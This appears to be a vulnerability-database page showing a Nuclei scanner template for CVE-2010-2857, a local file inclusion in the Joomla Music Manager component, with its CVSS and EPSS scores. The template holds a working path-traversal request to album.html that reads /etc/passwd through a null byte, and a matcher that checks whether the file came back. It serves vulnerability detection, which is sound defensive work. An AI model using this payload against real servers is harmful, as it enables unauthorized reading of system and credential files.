Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2857
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component Music Manager - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
4

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

82.1%

A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the cid parameter to album.html.

id: CVE-2010-2857

info:
  name: Joomla! Component Music Manager - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/14274
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2857
    - http://www.exploit-db.com/exploits/14274
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/60195
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-2857
    cwe-id: CWE-22
    epss-score: 0.00826
    epss-percentile: 0.8192
    cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: danieljamesscott
    product: com_music
  tags: cve,cve2010,joomla,lfi,edb,danieljamesscott

http:
  - method: GET
    path:
      - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202ac5f0a4f9ac3488e5fb632bba8473b66643a43886afa0927f3c711634c8b1b802210095a5da3a584d4804f11a0e4536761c7d8dac1f3bc625bd5f98a40d80c04ed818:922c64590222798bb761d5b6d8e72950

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

82.1%

Related for NUCLEI:CVE-2010-2857